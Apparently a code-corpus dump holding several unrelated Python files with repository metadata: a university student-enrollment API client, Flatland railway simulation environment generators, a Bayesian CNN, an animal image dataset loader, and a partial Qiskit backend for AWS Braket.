fe27fecf1f48f5d4699cad091ca66149a513fe9b
| 7,938
|
py
|
Python
|
sis/enrollments.py
|
ryanlovett/sis-cli
|
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
|
[
"Apache-2.0"
] | null | null | null |
sis/enrollments.py
|
ryanlovett/sis-cli
|
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
|
[
"Apache-2.0"
] | null | null | null |
sis/enrollments.py
|
ryanlovett/sis-cli
|
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
|
[
"Apache-2.0"
] | null | null | null |
# vim:set et sw=4 ts=4:
import logging
import sys
import jmespath
from . import sis, classes
# logging
logging.basicConfig(stream=sys.stdout, level=logging.WARNING)
logger = logging.getLogger(__name__)
# SIS endpoint
enrollments_uri = "https://apis.berkeley.edu/sis/v2/enrollments"
# apparently some courses have LAB without LEC (?)
section_codes = ['LEC', 'SES', 'WBL']
async def get_student_enrollments(app_id, app_key, identifier, term_id,
id_type='campus-uid', enrolled_only='true', primary_only='true',
course_attr='course-id'):
'''Gets a students enrollments.'''
uri = enrollments_uri + f"/students/{identifier}"
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
"page-number": 1,
"page-size": 100, # maximum
"id-type": id_type,
"term-id": term_id,
"enrolled-only": enrolled_only,
"primary-only": primary_only,
}
enrollments = await sis.get_items(uri, params, headers, 'studentEnrollments')
logger.debug(f"enrollments: {enrollments}")
if course_attr == 'course-id':
flt = '[].classSection.class.course.identifiers[?type == `cs-course-id`].id[]'
elif course_attr == 'display-name':
flt = '[].classSection.class.course.displayName'
return jmespath.search(flt, enrollments)
async def get_section_enrollments(app_id, app_key, term_id, section_id):
'''Gets a course section's enrollments.'''
uri = enrollments_uri + f"/terms/{term_id}/classes/sections/{section_id}"
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
"page-number": 1,
"page-size": 100, # maximum
}
enrollments = await sis.get_items(uri, params, headers, 'classSectionEnrollments')
logger.info(f"{section_id}: {len(enrollments)}")
return enrollments
def section_id(section):
'''Return a section's course ID, e.g. "15807".'''
return section['id']
def section_subject_area(section):
'''Return a section's subject area, e.g. "STAT".'''
return jmespath.search('class.course.subjectArea.code', section)
def section_catalog_number(section):
'''Return a section's formatted catalog number, e.g. "215B".'''
return jmespath.search('class.course.catalogNumber.formatted', section)
def section_display_name(section):
'''Return a section's displayName, e.g. "STAT 215B".'''
return jmespath.search('class.course.displayName', section)
def section_is_primary(section):
'''Return a section's primary status.'''
return jmespath.search('association.primary', section)
def enrollment_campus_uid(enrollment):
'''Return an enrollent's campus UID.'''
expr = "student.identifiers[?disclose && type=='campus-uid'].id | [0]"
return jmespath.search(expr, enrollment)
def enrollment_campus_email(enrollment):
'''Return an enrollment's campus email if found, otherwise
return any other email.'''
expr = "student.emails[?type.code=='CAMP'].emailAddress | [0]"
email = jmespath.search(expr, enrollment)
if email: return email
expr = "student.emails[?type.code=='OTHR'].emailAddress | [0]"
return jmespath.search(expr, enrollment)
def get_enrollment_uids(enrollments):
'''Given an SIS enrollment, return the student's campus UID.'''
return list(map(lambda x: enrollment_campus_uid(x), enrollments))
def get_enrollment_emails(enrollments):
'''Given an SIS enrollment, return the student's campus email.'''
return list(map(lambda x: enrollment_campus_email(x), enrollments))
def enrollment_status(enrollment):
'''Return an enrollment's status, e.g. 'E', 'W', or 'D'.'''
return jmespath.search('enrollmentStatus.status.code', enrollment)
def filter_enrollment_status(enrollments, status):
return list(filter(lambda x: enrollment_status(x) == status, enrollments))
def status_code(constituents):
return {'enrolled':'E', 'waitlisted':'W', 'dropped':'D'}[constituents]
async def get_students(term_id, class_number, constituents, credentials, exact, identifier='campus-uid'):
'''Given a term and class section number, return the student ids.'''
if exact:
# get all enrollments for this section
enrollments = await get_section_enrollments(
credentials['enrollments_id'], credentials['enrollments_key'],
term_id, class_number
)
else:
# get the data for the specified section
section = await classes.get_sections_by_id(
credentials['classes_id'], credentials['classes_key'],
term_id, class_number, include_secondary='true'
)
# extract the subject area and catalog number, e.g. STAT C8
subject_area = section_subject_area(section)
catalog_number = section_catalog_number(section)
logger.info(f"{subject_area} {catalog_number}")
# get enrollments in all matching sections
enrollments = await get_enrollments(
credentials['enrollments_id'], credentials['enrollments_key'],
term_id, subject_area, catalog_number
)
if constituents == 'students':
constituent_enrollments = enrollments
else:
# filter for those enrollments with a specific status code
constituent_enrollments = filter_enrollment_status(
enrollments, status_code(constituents))
# function to extract an enrollment attribute
if identifier == 'campus-uid':
enrollment_attr_fn = enrollment_campus_uid
else:
enrollment_attr_fn = enrollment_campus_email
logger.debug(f"constituent_enrollments: {constituent_enrollments}")
# we convert to a set to collapse overlapping enrollments between
# lectures and labs (if not exact)
return set(map(lambda x: enrollment_attr_fn(x), constituent_enrollments))
def filter_lectures(sections, relevant_codes=section_codes):
'''
Given a list of SIS sections:
[{'code': '32227', 'description': '2019 Spring ASTRON 128 001 LAB 001'}]
return only the section codes which are lectures.
'''
codes = []
for section in sections:
if 'description' not in section: continue
desc_words = set(section['description'].split())
if len(set(desc_words) & set(relevant_codes)) > 0:
codes.append(section['code'])
return codes
async def get_lecture_section_ids(app_id, app_key, term_id, subject_area, catalog_number=None):
'''
Given a term, subject, and course number, return the lecture section ids.
We only care about the lecture enrollments since they contain a superset
of the enrollments of all other section types (lab, dis).
'''
uri = enrollments_uri + f'/terms/{term_id}/classes/sections/descriptors'
headers = {
"Accept": "application/json",
"app_id": app_id,
"app_key": app_key
}
params = {
'page-number': 1,
"subject-area-code": subject_area
}
if catalog_number:
params["catalog-number"] = catalog_number
# Retrieve the sections associated with the course which includes
# both lecture and sections.
sections = await sis.get_items(uri, params, headers, 'fieldValues')
return filter_lectures(sections)
async def get_enrollments(app_id, app_key, term_id, subject_area, catalog_number):
'''Gets a course's enrollments from the SIS.'''
logger.info(f"get_enrollments: {subject_area} {catalog_number}")
# get the lectures
lecture_codes = await get_lecture_section_ids(app_id, app_key, term_id,
subject_area, catalog_number)
# get the enrollments in each lecture
enrollments = []
for section_id in lecture_codes:
enrollments += await get_section_enrollments(app_id, app_key, term_id, section_id)
logger.info(f'enrollments: {len(enrollments)}')
return enrollments
| 37.620853
| 105
| 0.68317
| 984
| 7,938
| 5.340447
| 0.208333
| 0.015985
| 0.018268
| 0.018839
| 0.341009
| 0.24529
| 0.213701
| 0.172788
| 0.156422
| 0.114558
| 0
| 0.00725
| 0.20068
| 7,938
| 210
| 106
| 37.8
| 0.820961
| 0.163769
| 0
| 0.205882
| 0
| 0
| 0.210957
| 0.087163
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095588
| false
| 0
| 0.029412
| 0.014706
| 0.257353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe292b4982f3dd8af18a6b88ccaadbbba6d158ef
| 8,012
|
py
|
Python
|
imitation_learning/generate_demonstrations/gen_envs.py
|
HaiDangDang/2020-flatland
|
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
|
[
"MIT"
] | 1
|
2021-02-21T02:54:35.000Z
|
2021-02-21T02:54:35.000Z
|
imitation_learning/generate_demonstrations/gen_envs.py
|
HaiDangDang/2020-flatland
|
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
|
[
"MIT"
] | null | null | null |
imitation_learning/generate_demonstrations/gen_envs.py
|
HaiDangDang/2020-flatland
|
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
|
[
"MIT"
] | null | null | null |
from flatland.envs.agent_utils import RailAgentStatus
from flatland.envs.malfunction_generators import malfunction_from_params, MalfunctionParameters
from flatland.envs.observations import GlobalObsForRailEnv
from flatland.envs.rail_env import RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
from flatland.utils.rendertools import RenderTool
import random
import sys
import os
import time
import msgpack
import json
from PIL import Image
import argparse as ap
def RandomTestParams(tid):
seed = tid * 19997 + 997
random.seed(seed)
width = 50 + random.randint(0, 100)
height = 50 + random.randint(0, 100)
nr_cities = 4 + random.randint(0, (width + height) // 10)
nr_trains = min(nr_cities * 20, 100 + random.randint(0, 100))
max_rails_between_cities = 2
max_rails_in_cities = 3 + random.randint(0, 5)
malfunction_rate = 30 + random.randint(0, 100)
malfunction_min_duration = 3 + random.randint(0, 7)
malfunction_max_duration = 20 + random.randint(0, 80)
return (
seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration
)
def RandomTestParams_small(tid):
seed = tid * 19997 + 997
random.seed(seed)
nSize = random.randint(0,5)
width = 20 + nSize * 5
height = 20 + nSize * 5
nr_cities = 2 + nSize // 2 + random.randint(0,2)
nr_trains = min(nr_cities * 5, 5 + random.randint(0,5)) #, 10 + random.randint(0, 10))
max_rails_between_cities = 2
max_rails_in_cities = 3 + random.randint(0, nSize)
malfunction_rate = 30 + random.randint(0, 100)
malfunction_min_duration = 3 + random.randint(0, 7)
malfunction_max_duration = 20 + random.randint(0, 80)
return (
seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration
)
def ShouldRunTest(tid):
return tid >= 7
#return tid >= 3
return True
def create_test_env(fnParams, nTest, sDir):
(seed, width, height,
nr_trains, nr_cities,
max_rails_between_cities, max_rails_in_cities,
malfunction_rate, malfunction_min_duration, malfunction_max_duration) = fnParams(nTest)
#if not ShouldRunTest(test_id):
# continue
rail_generator = sparse_rail_generator(
max_num_cities=nr_cities,
seed=seed,
grid_mode=False,
max_rails_between_cities=max_rails_between_cities,
max_rails_in_city=max_rails_in_cities,
)
#stochastic_data = {'malfunction_rate': malfunction_rate,
# 'min_duration': malfunction_min_duration,
# 'max_duration': malfunction_max_duration
# }
stochastic_data = MalfunctionParameters(malfunction_rate=malfunction_rate,
min_duration=malfunction_min_duration,
max_duration=malfunction_max_duration
)
observation_builder = GlobalObsForRailEnv()
DEFAULT_SPEED_RATIO_MAP = {
1.: 0.25,
1. / 2.: 0.25,
1. / 3.: 0.25,
1. / 4.: 0.25}
schedule_generator = sparse_schedule_generator(DEFAULT_SPEED_RATIO_MAP)
for iAttempt in range(5):
try:
env = RailEnv(
width=width,
height=height,
rail_generator=rail_generator,
schedule_generator=schedule_generator,
number_of_agents=nr_trains,
malfunction_generator_and_process_data=malfunction_from_params(stochastic_data),
obs_builder_object=observation_builder,
remove_agents_at_target=True
)
obs = env.reset(random_seed = seed)
break
except ValueError as oErr:
print("Error:", oErr)
width += 5
height += 5
print("Try again with larger env: (w,h):", width, height)
if not os.path.exists(sDir):
os.makedirs(sDir)
sfName = "{}/Level_{}.mpk".format(sDir, nTest)
if os.path.exists(sfName):
os.remove(sfName)
env.save(sfName)
sys.stdout.write(".")
sys.stdout.flush()
return env
#env = create_test_env(RandomTestParams_small, 0, "train-envs-small/Test_0")
def createEnvSet(nStart, nEnd, sDir, bSmall=True):
#print("Generate small envs in train-envs-small:")
print(f"Generate envs (small={bSmall}) in dir {sDir}:")
sDirImages = "train-envs-small/images/"
if not os.path.exists(sDirImages):
os.makedirs(sDirImages)
for test_id in range(nStart, nEnd, 1):
env = create_test_env(RandomTestParams_small, test_id, sDir)
oRender = RenderTool(env, gl="PILSVG")
#oRender.env = env
#oRender.set_new_rail()
oRender.render_env()
g2img = oRender.get_image()
imgPIL = Image.fromarray(g2img)
#imgPIL.show()
imgPIL.save(sDirImages + "Level_{}.png".format(test_id))
# print("Generate large envs in train-envs-1000:")
# for test_id in range(100):
# create_test_env(RandomTestParams, test_id, "train-envs-1000/Test_0")
def merge(sfEpisode, sfEnv, sfEnvOut, bJson=False):
if bJson:
with open(sfEpisode, "rb") as fEp:
oActions = json.load(fEp)
oEp = {"actions":oActions}
print("json oEp:", type(oEp), list(oEp.keys()))
else:
with open(sfEpisode, "rb") as fEp:
oEp = msgpack.load(fEp)
print("oEp:", type(oEp), list(oEp.keys()))
with open(sfEnv, "rb") as fEnv:
oEnv = msgpack.load(fEnv)
print("oEnv:", type(oEnv), list(oEnv.keys()))
# merge dicts
oEnv2 = {**oEp, **oEnv}
print("Merged keys:", list(oEnv2.keys()))
with open(sfEnvOut, "wb") as fEnv:
msgpack.dump(oEnv2, fEnv)
def printKeys1(sfEnv):
with open(sfEnv, "rb") as fEnv:
oEnv = msgpack.load(fEnv, encoding="utf-8")
print(sfEnv, "keys:", list(oEnv.keys()))
for sKey in oEnv.keys():
print("key", sKey, len(oEnv[sKey]))
if sKey == "shape":
print("shape: ", oEnv[sKey] )
def printKeys(sfEnvs):
try:
for sfEnv in sfEnvs:
printKeys1(sfEnv)
except:
# assume single env
printKeys1(sfEnvs)
def main2():
parser = ap.ArgumentParser(description='Generate envs, merge episodes into env files.')
parser.add_argument("-c", '--createEnvs', type=int, nargs=2, action="append",
metavar=("nStart", "nEnd"),
help='merge episode into env')
parser.add_argument("-d", "--outDir", type=str, nargs=1, default="./test-envs-tmp")
parser.add_argument("-m", '--merge', type=str, nargs=3, action="append",
metavar=("episode", "env", "output_env"),
help='merge episode into env')
parser.add_argument("-j", '--mergejson', type=str, nargs=3, action="append",
metavar=("json", "env", "output_env"),
help='merge json actions into env, with key actions')
parser.add_argument('-k', "--keys", type=str, action='append', nargs="+",
help='print the keys in a file')
args=parser.parse_args()
print(args)
if args.merge:
print("merge:", args.merge)
merge(*args.merge[0])
if args.mergejson:
print("merge json:", args.mergejson)
merge(*args.mergejson[0], bJson=True)
if args.keys:
print("keys:", args.keys)
printKeys(args.keys[0])
if args.outDir:
print("outDir", args.outDir)
if args.createEnvs:
print("create Envs - ", *args.createEnvs[0])
createEnvSet(*args.createEnvs[0], sDir=args.outDir)
if __name__=="__main__":
main2()
| 29.240876
| 96
| 0.623689
| 982
| 8,012
| 4.898167
| 0.226069
| 0.043243
| 0.04657
| 0.030561
| 0.33264
| 0.296258
| 0.259044
| 0.245738
| 0.208108
| 0.208108
| 0
| 0.026302
| 0.259735
| 8,012
| 273
| 97
| 29.347985
| 0.784691
| 0.079256
| 0
| 0.176796
| 0
| 0
| 0.076505
| 0.003261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049724
| false
| 0
| 0.082873
| 0
| 0.160221
| 0.121547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe2e74a698807b4b6d0cf881031198f5da548dd4
| 1,891
|
py
|
Python
|
Image Recognition/utils/BayesianModels/Bayesian3Conv3FC.py
|
AlanMorningLight/PyTorch-BayesianCNN
|
5de7133f09dd10135bf605efbdd26c18f2a4df13
|
[
"MIT"
] | 1
|
2020-02-10T12:58:25.000Z
|
2020-02-10T12:58:25.000Z
|
utils/BayesianModels/Bayesian3Conv3FC.py
|
SulemanKhurram/ThesisExperiments
|
4fdf7b6558c87a096dcdc374c35085ac946d3a58
|
[
"MIT"
] | null | null | null |
utils/BayesianModels/Bayesian3Conv3FC.py
|
SulemanKhurram/ThesisExperiments
|
4fdf7b6558c87a096dcdc374c35085ac946d3a58
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
from utils.BBBlayers import BBBConv2d, BBBLinearFactorial, FlattenLayer
class BBB3Conv3FC(nn.Module):
"""
Simple Neural Network having 3 Convolution
and 3 FC layers with Bayesian layers.
"""
def __init__(self, outputs, inputs):
super(BBB3Conv3FC, self).__init__()
self.conv1 = BBBConv2d(inputs, 32, 5, stride=1, padding=2)
self.soft1 = nn.Softplus()
self.pool1 = nn.MaxPool2d(kernel_size=3, stride=2)
self.conv2 = BBBConv2d(32, 64, 5, stride=1, padding=2)
self.soft2 = nn.Softplus()
self.pool2 = nn.MaxPool2d(kernel_size=3, stride=2)
self.conv3 = BBBConv2d(64, 128, 5, stride=1, padding=1)
self.soft3 = nn.Softplus()
self.pool3 = nn.MaxPool2d(kernel_size=3, stride=2)
self.flatten = FlattenLayer(2 * 2 * 128)
self.fc1 = BBBLinearFactorial(2 * 2 * 128, 1000)
self.soft5 = nn.Softplus()
self.fc2 = BBBLinearFactorial(1000, 1000)
self.soft6 = nn.Softplus()
self.fc3 = BBBLinearFactorial(1000, outputs)
layers = [self.conv1, self.soft1, self.pool1, self.conv2, self.soft2, self.pool2,
self.conv3, self.soft3, self.pool3, self.flatten, self.fc1, self.soft5,
self.fc2, self.soft6, self.fc3]
self.layers = nn.ModuleList(layers)
def probforward(self, x):
'Forward pass with Bayesian weights'
kl = 0
for layer in self.layers:
if hasattr(layer, 'convprobforward') and callable(layer.convprobforward):
x, _kl, = layer.convprobforward(x)
kl += _kl
elif hasattr(layer, 'fcprobforward') and callable(layer.fcprobforward):
x, _kl, = layer.fcprobforward(x)
kl += _kl
else:
x = layer(x)
logits = x
return logits, kl
| 35.679245
| 89
| 0.599683
| 229
| 1,891
| 4.886463
| 0.340611
| 0.022341
| 0.062556
| 0.040214
| 0.124218
| 0.124218
| 0.088472
| 0.088472
| 0
| 0
| 0
| 0.069733
| 0.28715
| 1,891
| 53
| 90
| 35.679245
| 0.760386
| 0.060814
| 0
| 0.052632
| 0
| 0
| 0.034618
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0.026316
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe2fc61a568a0e2538b7b1f99349a5186a485475
| 8,657
|
py
|
Python
|
custom_scripts/load_animals.py
|
nphilou/influence-release
|
bcf3603705b6ff172bcb62123aef0248afa77a05
|
[
"MIT"
] | null | null | null |
custom_scripts/load_animals.py
|
nphilou/influence-release
|
bcf3603705b6ff172bcb62123aef0248afa77a05
|
[
"MIT"
] | null | null | null |
custom_scripts/load_animals.py
|
nphilou/influence-release
|
bcf3603705b6ff172bcb62123aef0248afa77a05
|
[
"MIT"
] | null | null | null |
import os
from tensorflow.contrib.learn.python.learn.datasets import base
import numpy as np
import IPython
from subprocess import call
from keras.preprocessing import image
from influence.dataset import DataSet
from influence.inception_v3 import preprocess_input
BASE_DIR = 'data' # TODO: change
def fill(X, Y, idx, label, img_path, img_side):
img = image.load_img(img_path, target_size=(img_side, img_side))
x = image.img_to_array(img)
X[idx, ...] = x
Y[idx] = label
def extract_and_rename_animals():
class_maps = [
('dog', 'n02084071'),
('cat', 'n02121808'),
('bird', 'n01503061'),
('fish', 'n02512053'),
('horse', 'n02374451'),
('monkey', 'n02484322'),
('zebra', 'n02391049'),
('panda', 'n02510455'),
('lemur', 'n02496913'),
('wombat', 'n01883070'),
]
for class_string, class_id in class_maps:
class_dir = os.path.join(BASE_DIR, class_string)
print(class_dir)
call('mkdir %s' % class_dir, shell=True)
call('tar -xf %s.tar -C %s' % (os.path.join(BASE_DIR, class_id), class_dir), shell=True)
for filename in os.listdir(class_dir):
file_idx = filename.split('_')[1].split('.')[0]
src_filename = os.path.join(class_dir, filename)
dst_filename = os.path.join(class_dir, '%s_%s.JPEG' % (class_string, file_idx))
os.rename(src_filename, dst_filename)
def load_animals(num_train_ex_per_class=300,
num_test_ex_per_class=100,
num_valid_ex_per_class=0,
classes=None,
):
num_channels = 3
img_side = 299
if num_valid_ex_per_class == 0:
valid_str = ''
else:
valid_str = '_valid-%s' % num_valid_examples
if classes is None:
classes = ['dog', 'cat', 'bird', 'fish', 'horse', 'monkey', 'zebra', 'panda', 'lemur', 'wombat']
data_filename = os.path.join(BASE_DIR, 'dataset_train-%s_test-%s%s.npz' % (num_train_ex_per_class, num_test_ex_per_class, valid_str))
else:
data_filename = os.path.join(BASE_DIR, 'dataset_%s_train-%s_test-%s%s.npz' % ('-'.join(classes), num_train_ex_per_class, num_test_ex_per_class, valid_str))
num_classes = len(classes)
num_train_examples = num_train_ex_per_class * num_classes
num_test_examples = num_test_ex_per_class * num_classes
num_valid_examples = num_valid_ex_per_class * num_classes
if os.path.exists(data_filename):
print('Loading animals from disk...')
f = np.load(data_filename)
X_train = f['X_train']
X_test = f['X_test']
Y_train = f['Y_train']
Y_test = f['Y_test']
if 'X_valid' in f:
X_valid = f['X_valid']
else:
X_valid = None
if 'Y_valid' in f:
Y_valid = f['Y_valid']
else:
Y_valid = None
else:
print('Reading animals from raw images...')
X_train = np.zeros([num_train_examples, img_side, img_side, num_channels])
X_test = np.zeros([num_test_examples, img_side, img_side, num_channels])
# X_valid = np.zeros([num_valid_examples, img_side, img_side, num_channels])
X_valid = None
Y_train = np.zeros([num_train_examples])
Y_test = np.zeros([num_test_examples])
# Y_valid = np.zeros([num_valid_examples])
Y_valid = None
for class_idx, class_string in enumerate(classes):
print('class: %s' % class_string)
# For some reason, a lot of numbers are skipped.
i = 0
num_filled = 0
while num_filled < num_train_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
print(img_path)
if os.path.exists(img_path):
fill(X_train, Y_train, num_filled + (num_train_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
num_filled = 0
while num_filled < num_test_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
if os.path.exists(img_path):
fill(X_test, Y_test, num_filled + (num_test_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
num_filled = 0
while num_filled < num_valid_ex_per_class:
img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i))
if os.path.exists(img_path):
fill(X_valid, Y_valid, num_filled + (num_valid_ex_per_class * class_idx), class_idx, img_path, img_side)
num_filled += 1
print(num_filled)
i += 1
X_train = preprocess_input(X_train)
X_test = preprocess_input(X_test)
X_valid = preprocess_input(X_valid)
np.random.seed(0)
permutation_idx = np.arange(num_train_examples)
np.random.shuffle(permutation_idx)
X_train = X_train[permutation_idx, :]
Y_train = Y_train[permutation_idx]
permutation_idx = np.arange(num_test_examples)
np.random.shuffle(permutation_idx)
X_test = X_test[permutation_idx, :]
Y_test = Y_test[permutation_idx]
permutation_idx = np.arange(num_valid_examples)
np.random.shuffle(permutation_idx)
X_valid = X_valid[permutation_idx, :]
Y_valid = Y_valid[permutation_idx]
np.savez_compressed(data_filename, X_train=X_train, Y_train=Y_train, X_test=X_test, Y_test=Y_test, X_valid=X_valid, Y_valid=Y_valid)
train = DataSet(X_train, Y_train)
if (X_valid is not None) and (Y_valid is not None):
# validation = DataSet(X_valid, Y_valid)
validation = None
else:
validation = None
test = DataSet(X_test, Y_test)
return base.Datasets(train=train, validation=validation, test=test)
def load_koda():
num_channels = 3
img_side = 299
data_filename = os.path.join(BASE_DIR, 'dataset_koda.npz')
if os.path.exists(data_filename):
print('Loading Koda from disk...')
f = np.load(data_filename)
X = f['X']
Y = f['Y']
else:
# Returns all class 0
print('Reading Koda from raw images...')
image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg'))]
# Hack to get the image files in the right order
# image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and not image_file.startswith('124'))]
# image_files += [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and image_file.startswith('124'))]
num_examples = len(image_files)
X = np.zeros([num_examples, img_side, img_side, num_channels])
Y = np.zeros([num_examples])
class_idx = 0
for counter, image_file in enumerate(image_files):
img_path = os.path.join(BASE_DIR, 'koda', image_file)
fill(X, Y, counter, class_idx, img_path, img_side)
X = preprocess_input(X)
np.savez(data_filename, X=X, Y=Y)
return X, Y
def load_dogfish_with_koda():
classes = ['dog', 'fish']
X_test, Y_test = load_koda()
data_sets = load_animals(num_train_ex_per_class=900,
num_test_ex_per_class=300,
num_valid_ex_per_class=0,
classes=classes)
train = data_sets.train
validation = data_sets.validation
test = DataSet(X_test, Y_test)
return base.Datasets(train=train, validation=validation, test=test)
def load_dogfish_with_orig_and_koda():
classes = ['dog', 'fish']
X_test, Y_test = load_koda()
X_test = np.reshape(X_test, (X_test.shape[0], -1))
data_sets = load_animals(num_train_ex_per_class=900,
num_test_ex_per_class=300,
num_valid_ex_per_class=0,
classes=classes)
train = data_sets.train
validation = data_sets.validation
test = DataSet(
np.concatenate((data_sets.test.x, X_test), axis=0),
np.concatenate((data_sets.test.labels, Y_test), axis=0))
return base.Datasets(train=train, validation=validation, test=test)
| 35.479508
| 167
| 0.611644
| 1,210
| 8,657
| 4.047934
| 0.135537
| 0.023479
| 0.046958
| 0.0343
| 0.561862
| 0.53185
| 0.449367
| 0.368722
| 0.307472
| 0.280114
| 0
| 0.021666
| 0.274922
| 8,657
| 243
| 168
| 35.625514
| 0.758643
| 0.068615
| 0
| 0.357542
| 0
| 0
| 0.069921
| 0.007824
| 0
| 0
| 0
| 0.004115
| 0
| 1
| 0.03352
| false
| 0
| 0.044693
| 0
| 0.100559
| 0.055866
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe2fd1a403e44db33fca9bd236a441a4df247ba1
| 13,000
|
py
|
Python
|
src/qiskit_aws_braket_provider/awsbackend.py
|
carstenblank/qiskit-aws-braket-provider
|
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
|
[
"Apache-2.0"
] | 7
|
2020-09-25T17:16:54.000Z
|
2021-05-20T10:42:52.000Z
|
src/qiskit_aws_braket_provider/awsbackend.py
|
carstenblank/qiskit-aws-braket-provider
|
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
|
[
"Apache-2.0"
] | 4
|
2020-09-21T19:33:39.000Z
|
2020-09-22T12:21:11.000Z
|
src/qiskit_aws_braket_provider/awsbackend.py
|
carstenblank/qiskit-aws-braket-provider
|
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
|
[
"Apache-2.0"
] | 1
|
2020-09-21T19:32:16.000Z
|
2020-09-21T19:32:16.000Z
|
# Copyright 2020 Carsten Blank
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from datetime import datetime, timedelta
from braket.device_schema.device_service_properties_v1 import DeviceCost
from typing import List, Dict, Optional, Any, Union, Tuple
from botocore.response import StreamingBody
from braket.aws import AwsDevice, AwsQuantumTask, AwsSession
from braket.circuits import Circuit
from braket.device_schema import DeviceCapabilities
from braket.device_schema.ionq import IonqDeviceCapabilities
from braket.device_schema.rigetti import RigettiDeviceCapabilities
from braket.device_schema.simulators import GateModelSimulatorDeviceCapabilities
from qiskit.providers import BaseBackend, JobStatus
from qiskit.providers.models import QasmBackendConfiguration, BackendProperties, BackendStatus
from qiskit.qobj import QasmQobj
from . import awsjob
from . import awsprovider
from .conversions_configuration import aws_device_2_configuration
from .conversions_properties import aws_ionq_to_properties, aws_rigetti_to_properties, aws_simulator_to_properties
from .transpilation import convert_qasm_qobj
logger = logging.getLogger(__name__)
class AWSBackend(BaseBackend):
_aws_device: AwsDevice
_configuration: QasmBackendConfiguration
_provider: 'awsprovider.AWSProvider'
def __init__(self, aws_device: AwsDevice, provider: 'awsprovider.AWSProvider' = None):
super().__init__(aws_device_2_configuration(aws_device), provider)
self._aws_device = aws_device
self._run = aws_device.run
def properties(self) -> BackendProperties:
properties: DeviceCapabilities = self._aws_device.properties
if isinstance(properties, IonqDeviceCapabilities):
return aws_ionq_to_properties(properties, self._configuration)
if isinstance(properties, RigettiDeviceCapabilities):
return aws_rigetti_to_properties(properties, self._configuration)
if isinstance(properties, GateModelSimulatorDeviceCapabilities):
return aws_simulator_to_properties(properties, self._configuration)
def status(self) -> BackendStatus:
# now = datetime.now()
# windows = self._aws_device.properties.service.executionWindows
# is_in_execution_window = windows.
status: str = self._aws_device.status
backend_status: BackendStatus = BackendStatus(
backend_name=self.name(),
backend_version=self.version(),
operational=False,
pending_jobs=0, # TODO
status_msg=status
)
if status == 'ONLINE':
backend_status.operational = True
elif status == 'OFFLINE':
backend_status.operational = False
else:
backend_status.operational = False
return backend_status
def _get_job_data_s3_folder(self, job_id):
return f"results-{self.name()}-{job_id}"
@staticmethod
def _exists_file(s3_client, s3_bucket: str, file: str):
result: dict = s3_client.list_objects_v2(
Bucket=s3_bucket,
Prefix=file
)
# TODO: error handling
return result['KeyCount'] != 0
def _save_job_task_arns(self, job_id: str, task_arns: List[str],
s3_bucket: Optional[str] = None) -> AwsSession.S3DestinationFolder:
used_s3_bucket = s3_bucket or self._provider.get_default_bucket()
s3_client = self._provider.get_s3_client()
